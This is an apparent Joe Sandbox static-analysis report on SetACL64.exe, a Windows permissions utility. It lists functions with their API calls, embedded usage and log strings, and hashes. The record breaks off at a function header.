Part of subcall function 00007FF686873E64: GetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873E73
Part of subcall function 00007FF686873E64: SetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873F11

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF686877733,?,00000000,00000092,?,?,00000000,?,00007FF68686966D), ref: 00007FF6868770DA

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 1afc97474f9d45eb20386b3fa683427653916469593d3b285663595b79b4a93e
Instruction ID: 7dd87d9b78635a830b3dcd8030721f27d588ec3d93a822a73866d1ea84b7a963
Opcode Fuzzy Hash: 1afc97474f9d45eb20386b3fa683427653916469593d3b285663595b79b4a93e
Instruction Fuzzy Hash: 2E0192A2B09285C6E7144B15E4407B976A1FF40BA4F459235D76D876D5CE7B9C80C710

Function 00007FF68687791C Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF686877D71,?,?,?,?,?,?,?,?,00000000,00007FF6868765D8), ref: 00007FF68687796B

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 50e1e414d65792309ee3aaeac2ef96dc1d2e2a6e8bc8ede1a31a07ac19fd8208
Instruction ID: c306239d1734bb5ca2473b45a06e15ac1de8fe6bfd661306a2a7304e562cc734
Opcode Fuzzy Hash: 50e1e414d65792309ee3aaeac2ef96dc1d2e2a6e8bc8ede1a31a07ac19fd8208
Instruction Fuzzy Hash: A4F0F6B6A08B85C3E7049B15E8546A922A2BF98B80F448139DA4D97369DE3DD861C710

Function 00007FF68687D744 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF68687D748

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 227af5b2b01adeec9a4c4bb0160e400c0b56438fa23b95ceffa25b2c6b663f7a
Instruction ID: f4c0dd2543cf37570a6df173d85a1198517d4938fbd84c4fd2adcb355c3637f0
Opcode Fuzzy Hash: 227af5b2b01adeec9a4c4bb0160e400c0b56438fa23b95ceffa25b2c6b663f7a
Instruction Fuzzy Hash: 65B09260E17A0AC6EA482B116C4221422A67F88700F88413CC04DC1330EF2D28A68720

Function 00007FF68687BD40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 661991537337df00cfedef2c042225d99e55b89d68283520a0b1d8c619bedd07
Instruction ID: eaed822394d7897ce4221a68ba08a33e152f8dfb5048b762e488c3867975eb91
Opcode Fuzzy Hash: 661991537337df00cfedef2c042225d99e55b89d68283520a0b1d8c619bedd07
Instruction Fuzzy Hash: 4EF068B1718255CADB948F69A40262977D1FB483C0F40C07DD5CDC7B14DA3D9460CF18

Function 00007FF686863034 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d0e1896d5a2671fcb65b32faac8bfb0f24e93e9d35c82eef40207f8067d8423
Instruction ID: 0b568bb87c41468da6c293a72634647d086196acb25e68c936ee87ce2a58cb49
Opcode Fuzzy Hash: 0d0e1896d5a2671fcb65b32faac8bfb0f24e93e9d35c82eef40207f8067d8423
Instruction Fuzzy Hash: 7BA002A195CC0AE5E6088F01E9550356331FF94750F411039C20DC1072DF3EAE05C325

Function 00007FF686828A80 Relevance: 38.7, APIs: 4, Strings: 18, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF686834810: FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF686834859
Part of subcall function 00007FF686834810: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF68683486D
Part of subcall function 00007FF686834810: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF686834882
Part of subcall function 00007FF686834810: FreeResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF686834964

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686828D9E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686828DA4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686828DAA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686828DB0

Strings

License: Freeware, xrefs: 00007FF686828C6D
=======, xrefs: 00007FF686828C91
The usage reference can be found at, xrefs: 00007FF686828D21
Homepage: https://helgeklein.com, xrefs: 00007FF686828C42
Documentation and examples are maintained at, xrefs: 00007FF686828D09
==============, xrefs: 00007FF686828CF1
https://helgeklein.com., xrefs: 00007FF686828D15
Version: , xrefs: 00007FF686828ADD
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe, xrefs: 00007FF686828D2D
[-actn Action2 ParametersForAction2], xrefs: 00007FF686828CC1
SetACL -on ObjectName -ot ObjectType, xrefs: 00007FF686828CA9
[Options], xrefs: 00007FF686828CCD
SetACL by Helge Klein, xrefs: 00007FF686828C2A
-actn Action1 ParametersForAction1, xrefs: 00007FF686828CB5
Copyright: Helge Klein, xrefs: 00007FF686828C61
Syntax:, xrefs: 00007FF686828C85
FileVersion, xrefs: 00007FF686828ABA
Documentation:, xrefs: 00007FF686828CE5

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Resource_invalid_parameter_noinfo_noreturn$FindFreeLoadLock
String ID: SetACL by Helge Klein$ -actn Action1 ParametersForAction1$ [-actn Action2 ParametersForAction2]$ [Options]$=======$==============$Copyright: Helge Klein$Documentation and examples are maintained at$Documentation:$FileVersion$Homepage: https://helgeklein.com$License: Freeware$SetACL -on ObjectName -ot ObjectType$Syntax:$The usage reference can be found at$Version: $https://helgeklein.com.$https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
API String ID: 3000141576-3422969368
Opcode ID: 69f405b78d0f5892647151657973b3344c7a68e1b36205c54eef986998ac8fed
Instruction ID: db308be865448a961b9c0b31af7401c848ebc826b6874349b9a457f0baa38385
Opcode Fuzzy Hash: 69f405b78d0f5892647151657973b3344c7a68e1b36205c54eef986998ac8fed
Instruction Fuzzy Hash: DE91A1F1E28A42D8FB00EB64E8953BD2322BF54758F804139D60D866E6DF7EE954C360

Function 00007FF686878294 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF6868782AF
try_get_function.LIBVCRUNTIME ref: 00007FF6868782CE

Part of subcall function 00007FF686877998: GetProcAddress.KERNEL32(?,?,00000006,00007FF686877E8A,?,?,0000F23FCA72FB90,00007FF68687402A,?,?,0000F23FCA72FB90,00007FF68686E201), ref: 00007FF686877AF0

try_get_function.LIBVCRUNTIME ref: 00007FF6868782ED

Part of subcall function 00007FF686877998: LoadLibraryExW.KERNELBASE(?,?,00000006,00007FF686877E8A,?,?,0000F23FCA72FB90,00007FF68687402A,?,?,0000F23FCA72FB90,00007FF68686E201), ref: 00007FF686877A3B
Part of subcall function 00007FF686877998: GetLastError.KERNEL32(?,?,00000006,00007FF686877E8A,?,?,0000F23FCA72FB90,00007FF68687402A,?,?,0000F23FCA72FB90,00007FF68686E201), ref: 00007FF686877A49
Part of subcall function 00007FF686877998: LoadLibraryExW.KERNEL32(?,?,00000006,00007FF686877E8A,?,?,0000F23FCA72FB90,00007FF68687402A,?,?,0000F23FCA72FB90,00007FF68686E201), ref: 00007FF686877A8B

try_get_function.LIBVCRUNTIME ref: 00007FF68687830C

Part of subcall function 00007FF686877998: FreeLibrary.KERNEL32(?,?,00000006,00007FF686877E8A,?,?,0000F23FCA72FB90,00007FF68687402A,?,?,0000F23FCA72FB90,00007FF68686E201), ref: 00007FF686877AC4

try_get_function.LIBVCRUNTIME ref: 00007FF68687832B
try_get_function.LIBVCRUNTIME ref: 00007FF68687834A
try_get_function.LIBVCRUNTIME ref: 00007FF686878369
try_get_function.LIBVCRUNTIME ref: 00007FF686878388
try_get_function.LIBVCRUNTIME ref: 00007FF6868783A7
try_get_function.LIBVCRUNTIME ref: 00007FF6868783C6

Strings

AreFileApisANSI, xrefs: 00007FF6868782A8
LocaleNameToLCID, xrefs: 00007FF6868783CB, 00007FF6868783DE
CompareStringEx, xrefs: 00007FF6868782C7
LCIDToLocaleName, xrefs: 00007FF6868783AC, 00007FF6868783BF
IsValidLocaleName, xrefs: 00007FF68687836E, 00007FF686878381
LCMapStringEx, xrefs: 00007FF6868783A0
GetTimeFormatEx, xrefs: 00007FF686878330, 00007FF686878343
GetLocaleInfoEx, xrefs: 00007FF686878324
EnumSystemLocalesEx, xrefs: 00007FF6868782D3, 00007FF6868782E6
GetDateFormatEx, xrefs: 00007FF6868782F2, 00007FF686878305
GetUserDefaultLocaleName, xrefs: 00007FF68687834F, 00007FF686878362

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
API String ID: 3255926029-3252031757
Opcode ID: 9211e9d41fbef9106278706ba9ffd9f3a7d029d209f8dabeb844061a5d1a6813
Instruction ID: 29258748c91e17bcbf5dcb6540d27afc1c18e4c14e001c0f592ee7e051479d39
Opcode Fuzzy Hash: 9211e9d41fbef9106278706ba9ffd9f3a7d029d209f8dabeb844061a5d1a6813
Instruction Fuzzy Hash: 51314FE0A09A4BE2F604DB75E8516E06321BF65348FC0543FE10D961B5DE7EAE4AC760

Function 00007FF686841200 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

AddTrusteesFromFile, xrefs: 00007FF68684151C
" , xrefs: 00007FF686841750
Input file for trustee operation opened: ', xrefs: 00007FF686841490

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID:
String ID: " $AddTrusteesFromFile$Input file for trustee operation opened: '
API String ID: 0-3105513592
Opcode ID: cfcd9179b3afa49e84231abe562083495f775b235c5cd478525bc830438bbd8e
Instruction ID: c8eac5995f803667b206ae1984d4e1b885ca59e88142cff51a689b0efc943b9d
Opcode Fuzzy Hash: cfcd9179b3afa49e84231abe562083495f775b235c5cd478525bc830438bbd8e
Instruction Fuzzy Hash: 5EA17EA2A28B52C5F7109B64D8983FD2371FF44788F405439DA4C97AAADF7DE980C364

Function 00007FF68683FC00 Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 467COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF68683FC34
LeaveCriticalSection.KERNEL32 ref: 00007FF68683FC4B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686840378
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684037E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686840384
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684038A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686840396
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684039C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868403A2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868403A8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868403AE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868403B4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868403BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868403C0

Strings

SetLogFile, xrefs: 00007FF68683FE21, 00007FF68683FFFC, 00007FF6868401DC
Starting SetACL.exe , xrefs: 00007FF68683FF10
FileVersion, xrefs: 00007FF68683FC81
====================================================================, xrefs: 00007FF68683FDF1, 00007FF6868401B0
on , xrefs: 00007FF68683FF27

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave
String ID: on $====================================================================$FileVersion$SetLogFile$Starting SetACL.exe
API String ID: 363805048-2110037876
Opcode ID: bfe008777ad23c9cdc2350b9679eda7746b6eef8af8c9e99fa761d27b66fba6f
Instruction ID: 6eec1cd2a4303bcb07f100f73594248ec9fe21cb4d3bd4b246e06f79bb912e6e
Opcode Fuzzy Hash: bfe008777ad23c9cdc2350b9679eda7746b6eef8af8c9e99fa761d27b66fba6f
Instruction Fuzzy Hash: 382283B2B18B41C1EB008B68D5493AD6765FF857E8F505229DB5C47AEADF7EE880C310

Function 00007FF68685B8E0 Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 409COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32 ref: 00007FF68685B8E5
GetLastError.KERNEL32 ref: 00007FF68685B8F3

Part of subcall function 00007FF68683BF60: GetLastError.KERNEL32 ref: 00007FF68683BFCE

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685BF09
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685BF0F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685BF15
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685BF21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685BF27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685BF2D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685BF33
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685BF39
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685BF45
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685BF4B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685BF57
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685BF5D

Strings

CreateDirectoryAPIWrapper, xrefs: 00007FF68685B9D4, 00007FF68685BC00, 00007FF68685BD9A
Directory already exists: ', xrefs: 00007FF68685BB9F
The directory ', xrefs: 00007FF68685B962
' could not be created because: , xrefs: 00007FF68685B979
Created the directory ', xrefs: 00007FF68685BD39

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$CreateDirectory
String ID: ' could not be created because: $CreateDirectoryAPIWrapper$Created the directory '$Directory already exists: '$The directory '
API String ID: 3201042626-1824261680
Opcode ID: d1b5d7231ef0ce28a8e66e00800bd7d89ee647de3540f67a21a8ce9304b88add
Instruction ID: 93511b38c148271b7b8752f99d1cb1c9bd9f17d96bdad5aff9e6079489fe33ac
Opcode Fuzzy Hash: d1b5d7231ef0ce28a8e66e00800bd7d89ee647de3540f67a21a8ce9304b88add
Instruction Fuzzy Hash: DA02A0A2B18B42C5EB00CF78D4593AC2322BF447A8F405239DA6D976EADF7DE945C314

Function 00007FF686843755 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 185COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF686843760
GetLastError.KERNEL32 ref: 00007FF68684376E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443DD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443E3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443E9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443EF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443F5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844401
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844407
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684440D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844413
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844419
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684441F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844425
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684442B

Strings

The version of your operating system could not be determined., xrefs: 00007FF68684379A
Prepare, xrefs: 00007FF6868437C8, 00007FF6868438E5
SetACL only supports Windows Vista and later., xrefs: 00007FF6868438B7

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastVersion
String ID: Prepare$SetACL only supports Windows Vista and later.$The version of your operating system could not be determined.
API String ID: 1165008562-2181592180
Opcode ID: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
Instruction ID: 404cbae69a388cced9087b609e9ddc220526397fc3701baf575379e0d3a99ea1
Opcode Fuzzy Hash: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
Instruction Fuzzy Hash: 8071C9B1A69783C1EA009B64D0887AD6321FF857A4F401539E75D876FADFBEE840C720

Function 00007FF686842008 Relevance: 28.6, APIs: 19, Instructions: 119COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684212B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842131
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842137
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684213D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842143
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842149
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684214F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842155
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842161
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842167
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684216D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842173
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684217F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842185
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684218B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842191
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842197
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684219D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868421A3

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 46baa353a109fce6319f0045732bcd5145af92d8f24574fb33639b16f7aed1b8
Instruction ID: d676bfd7afe2c6603d926ac75539bccb0f188e547e0cabb8e52d75d32d920b7d
Opcode Fuzzy Hash: 46baa353a109fce6319f0045732bcd5145af92d8f24574fb33639b16f7aed1b8
Instruction Fuzzy Hash: E04158E1A7A753C0F900A768D4EE3BD1222FF45794F401939D75C8A5E7EE6EA940C224

Function 00007FF6868413D1 Relevance: 28.6, APIs: 19, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c5659fc54ca624ddf6d2490e80867d1b248a83083ebe8249bddcb2d4f27d4c86
Instruction ID: 8f60d5d810b9164fd4eac0618ac9a524d2b8955fc1b6da52651a777547485502
Opcode Fuzzy Hash: c5659fc54ca624ddf6d2490e80867d1b248a83083ebe8249bddcb2d4f27d4c86
Instruction Fuzzy Hash: 953132E1ABA753C4F910B76894EE3BD1222FF41794F401839D75C8A9E7EE6E6940C234

Function 00007FF68685ECA0 Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 446shareCOMMON

